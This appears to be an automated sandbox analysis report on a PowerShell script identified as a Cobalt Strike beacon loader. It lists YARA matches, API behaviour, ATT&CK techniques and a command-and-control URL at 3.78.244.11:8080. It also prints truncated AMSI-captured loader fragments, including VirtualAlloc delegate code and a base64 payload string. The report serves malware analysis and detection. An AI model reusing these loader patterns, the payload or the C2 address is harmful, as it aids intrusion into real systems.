Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Msfpayloads_msf_ref | date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.evad.winPS1@2/5@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000022EFA0C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_0000022EFA0C0B70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000022EFA0C867C TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0000022EFA0C867C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5noeq2o4.gsw.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 3.ps1 | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                      Data Obfuscation

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Z
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer 0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EF9B4776C push 0000006Ah; retf 0_2_0000022EF9B47784
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EF9B41F35 push rsp; iretw 0_2_0000022EF9B41F36
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0E3935 push rsp; iretw 0_2_0000022EFA0E3936
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0E916C push 0000006Ah; retf 0_2_0000022EFA0E9184
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B895B77 pushad ; iretd 0_2_00007FFD9B895BB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B89A26C push esp; retf 0_2_00007FFD9B89A26D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B9603E9 push cs; iretd 0_2_00007FFD9B96040A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B964FAD push ss; iretd 0_2_00007FFD9B9651F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B967F1D push ecx; iretd 0_2_00007FFD9B967F1E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B964218 push eax; ret 0_2_00007FFD9B964219
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B9679EA push esi; iretd 0_2_00007FFD9B9679EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B96158C push edi; ret 0_2_00007FFD9B961598
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B9654D0 push ds; iretd 0_2_00007FFD9B9654D2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B967CAD push esp; iretd 0_2_00007FFD9B967CAE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0D01A8 EncodePointer,GetModuleHandleW,GetProcAddress (x29) 0_2_0000022EFA0D01A8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C5854 0_2_0000022EFA0C5854
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0BFA1C 0_2_0000022EFA0BFA1C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3583
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6247
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  API coverage: 2.1 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 6592  Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose 0_2_0000022EFA0C1C30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose 0_2_0000022EFA0C9220
                      Source: powershell.exe, 00000000.00000002.4121090412.0000022EF9CE5000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW0
                      Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9DBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4121724697.0000022EF9DB6000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  API call chain: ExitProcess graph end node  graph_0-42236
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer 0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C76F0 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList 0_2_0000022EFA0C76F0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0E24E0 RtlVirtualUnwind,SetUnhandledExceptionFilter 0_2_0000022EFA0E24E0

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match  File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError 0_2_0000022EFA0CDF50
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0CDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid 0_2_0000022EFA0CDEC8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C0920 CreateNamedPipeA 0_2_0000022EFA0C0920
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0DECB0 GetSystemTimeAsFileTime 0_2_0000022EFA0DECB0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0E2068 GetUserNameA 0_2_0000022EFA0E2068
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf 0_2_0000022EFA0C5E28

                      Remote Access Functionality

                      Source: Yara match  File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
                      Source: Yara match  File source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match  File source: 3.ps1, type: SAMPLE
                      Source: Yara match  File source: amsi64_1900.amsi.csv, type: OTHER
                      Source: Yara match  File source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C6670 htonl,htons,socket,closesocket,bind,ioctlsocket 0_2_0000022EFA0C6670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0CEE8C socket,closesocket,htons,bind,listen 0_2_0000022EFA0CEE8C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0E2630 bind 0_2_0000022EFA0E2630
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_0000022EFA0C6A78 socket,htons,ioctlsocket,closesocket,bind,listen 0_2_0000022EFA0C6A78
                      MITRE ATT&CK Matrix
                      (rebuilt from the flattened matrix; the number the report attaches to a flagged technique is kept in parentheses after it, the remaining entries are the unflagged cells of the matrix)

                      Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
                      Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
                      Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
                      Execution: Native API (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
                      Persistence: Valid Accounts (2), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
                      Privilege Escalation: Valid Accounts (2), Access Token Manipulation (21), Process Injection (2), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
                      Defense Evasion: Masquerading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (21), Access Token Manipulation (21), Process Injection (2), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1), HTML Smuggling
                      Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
                      Discovery: System Time Discovery (1), Security Software Discovery (141), Virtualization/Sandbox Evasion (21), Process Discovery (2), Application Window Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (2), System Information Discovery (13)
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
                      Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
                      Command and Control: Encrypted Channel (2), Non-Standard Port (1), Ingress Tool Transfer (2), Non-Application Layer Protocol (1), Application Layer Protocol (111), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
                      Antivirus detection for the submitted sample

                      Source | Detection | Scanner | Label
                      3.ps1 | 74% | ReversingLabs | Script-PowerShell.Trojan.CobaltStrike
                      3.ps1 | 100% | Avira | TR/Coblat.G1

                      No Antivirus matches
                      Antivirus detection for URLs and IPs found in memory strings

                      Source | Detection | Scanner | Label
                      http://3.78.244.11:8080/dot.gif11:8080/dot.gif | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gif~ | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifll | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifU | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifllV | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifPDL | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifG | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifD | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gif | 0% | Avira URL Cloud | safe
                      3.78.244.11 | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gife | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gif9.0 | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gifystem32 | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gif2 | 0% | Avira URL Cloud | safe
                      http://3.78.244.11:8080/dot.gif1 | 0% | Avira URL Cloud | safe
                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
3.78.244.11 | true | Avira URL Cloud: safe | unknown
http://3.78.244.11:8080/dot.gif | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://3.78.244.11:8080/dot.gifG | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gif~ | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gif11:8080/dot.gif | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gifD | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gifllV | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3.78.244.11:8080/dot.gifPDL | powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3.78.244.11:8080/dot.gifll | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gifU | powershell.exe, 00000000.00000002.4121724697.0000022EF9D85000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gife | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3.78.244.11:8080/dot.gifystem32 | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://3.78.244.11:8080/dot.gif9.0 | powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://127.0.0.1:%u/ | powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gif1 | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.v | powershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://3.78.244.11:8080/dot.gif2 | powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
